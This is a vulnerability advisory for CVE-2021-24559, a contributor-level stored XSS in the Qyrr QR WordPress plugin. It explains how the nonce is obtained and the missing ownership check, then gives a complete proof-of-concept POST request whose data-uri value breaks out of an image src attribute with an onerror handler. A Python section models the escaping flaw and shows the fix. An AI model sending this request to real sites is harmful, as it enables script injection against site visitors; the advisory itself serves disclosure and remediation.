Qyrr < 0.7 - Authenticated (contributor+) Stored XSS

26 Jul 2021 00:00:00 | Reported by dc11 | Type: wpexploit

Authenticating contributor account needed to exploit Stored XSS vulnerability in QR WordPress plugi

Related:
CVE: CVE-2021-24559 (16 Jan 2024 16:15)
NVD: CVE-2021-24559 (16 Jan 2024 16:15)
WPVulnDB: Qyrr < 0.7 - Authenticated (contributor+) Stored XSS (26 Jul 2021 00:00)
Prion: Cross site scripting (16 Jan 2024 16:15)
Cvelist: CVE-2021-24559 Qyrr < 0.7 - Authenticated (contributor+) Stored XSS (16 Jan 2024 15:48)

To exploit this vulnerability, the attacker needs access to an account with at least the 'edit_posts' capability (e.g. contributor). This is required to obtain a nonce, which is used to protect the affected AJAX function.

To obtain the nonce, the attacker requests "<your host here>/wp-admin/edit.php?post_type=qr". The nonce is then found in the script with the id "qyrr-admin-js-extra".

Inside the script, the exploitable QR posts are listed (post_id is the id of the post meta data with the meta key 'data-uri'). There is no check that the requesting user is the owner of that QR post.

The third required parameter is data-uri. This parameter will contain the stored JavaScript. During request processing, data-uri is sanitized by sanitize_text_field, but it is not escaped when output in the src attribute of the QR code image.


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94
Connection: close
Cookie: [contributor+]

action=data_uri_to_meta&nonce=d5c0a0e3fa&post_id=1238&data-uri=+%22+onerror%3Dalert(1)+e%3D%22


Then access the page/post where the QR code is embedded to trigger the XSS.
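
The following is an added example, not code from the plugin or from the original report. It models why tag stripping alone does not protect an attribute context and how attribute escaping (the role esc_attr() plays in WordPress) and input validation close the gap. sanitize_text_model is a simplified stand-in for sanitize_text_field, and the PNG data URI pattern is an assumption about what a legitimate value looks like.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Form body copied from the request shown above.
BODY = "action=data_uri_to_meta&nonce=d5c0a0e3fa&post_id=1238&data-uri=+%22+onerror%3Dalert(1)+e%3D%22"
# Assumption: a legitimate value is a base64-encoded PNG data URI.
DATA_URI_RE = re.compile(r"data:image/png;base64,[A-Za-z0-9+/]+={0,2}")


def sanitize_text_model(value):
    """Simplified model of sanitize_text_field: strips tags and extra
    whitespace but, like the real function, leaves quote characters alone."""
    value = re.sub(r"<[^>]*>", "", value)
    return re.sub(r"\s+", " ", value).strip()


def render_img(data_uri, escape):
    """Build the <img> tag with or without attribute escaping."""
    if escape:
        data_uri = html.escape(data_uri, quote=True)  # role of esc_attr()
    return '<img src="' + data_uri + '">'


class AttrCollector(HTMLParser):
    """Records the attribute names an HTML parser sees on <img> tags."""
    def __init__(self):
        super().__init__()
        self.attrs = []
    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.attrs.extend(name for name, _ in attrs)


def img_attribute_names(markup):
    collector = AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attrs


def is_valid_qr_data_uri(value):
    """Input validation: accept only the expected data URI shape."""
    return DATA_URI_RE.fullmatch(value) is not None


# Value as it would be stored after the modelled sanitization step.
STORED = sanitize_text_model(parse_qs(BODY)["data-uri"][0])
```

Escaping and validation address the script injection only. The missing ownership check described above needs a separate per-post authorization check in the AJAX handler.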

Vulners AI Score: 5.5 (Medium risk) | EPSS: 0.001